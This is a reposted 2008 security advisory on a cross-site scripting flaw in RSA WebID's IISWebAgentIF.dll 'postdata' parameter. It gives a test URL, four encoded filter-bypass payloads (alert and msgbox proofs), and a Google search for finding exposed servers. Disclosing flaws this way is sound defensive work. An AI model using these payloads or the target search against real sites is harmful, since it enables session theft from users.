Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19428
HistoryMar 17, 2008 - 12:00 a.m.

Security Advisory on RSA Web ID (XSS)

2008-03-1700:00:00
vulners.com
59

The following security report has been sent to RSA/EMC on the 2/10/2007 and confirmed by them. RSA took action to alert
their customers.


Description
The WebID authentication framework suffers from a flow allowing to steal an authenticated users's session if he is
enticed into clicking a malicous link.

TEST URL :
https://www.yournamehere.com/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&authntype=2&username=a&passcode=a&postdata=aaa"%20><SCRIPT>alert(document.cookie)</script><!--

Analysis
The problem resides in the main library IISWebAgentIF.dll which can usually be found a the address
"http://www.server.com/WebID/IISWebAgentIF.dll" this entry point accepts many parameters but only the "postdata" parameter
has been found vulnerable.
This parameter is normally sent over a POST method but it is equally accepted through a GET.

This bug has already been reported and confirmed in April 2005 as CVE-2005-118 and a security fix has been issued.
Nevertheless, it appears that the fix is poorly implemented as basic circumvention techniques allows to bypass those
security checks.

This parameter is matched against the string ""><SCRIPT". It also seems to be matched against the string "javascript:"
and probably other keywords. If any of this keywords is matched, the whole value is filtered out from the input.
The problem resides in the fact that creating a exhaustive list of the dangerous keywords is very hard, due to the
complexity of the modern scripting codes (HTML, VB, JavaScript etc…).

These examples illustrates how to execute code on the page without triggering the security mechanisms (could be many
more) :

[inserting a newline between the tags]
postdata=aaa%22%3E%0A%3CSCRIPT%3Ealert(document.cookie)%3C/script%3E

[insterting a space between the quotation marks and the closing bracket.]
postdata=aaa%22%20%3E%3CSCRIPT%3Ealert(document.cookie)%3C/script%3E

[using the DIV tag to avoid using the keyword "javascript:" (IE only)]
postdata=aaa%22%3E<DIV%20STYLE="width:expression(alert(document.cookie));">

[using VBScript instead of JavaScript (IE only)]
postdata=aaa%22%3E<iframe%20SRC='VBScript:msgbox("XSS")'%20style="visibility:hidden

Context
The exploitation of the vulnerability requires an action from the victim (clicking on a malicious link).
As the bug is accessible prior to the authentication phase, it can be discovered and exploited without any access to the
underlying application. As the URL denotes the presence of the product, many vulnerable targets can be found easily (ex
google "inurl:IISWebAgentIF.dll" ). Finally, it is possible to insert comments at the end of the malicious code to make
the victim's page unchanged.

*Affected Software
We have confirmed the existence of this vulnerability in RSA WebID 5.3 + Security Fix XSS ID 45559. It is suspected that
any earlier version is also vulnerable.

Recommandation
It's safer to filter out dangerous characters instead of dangerous keywords.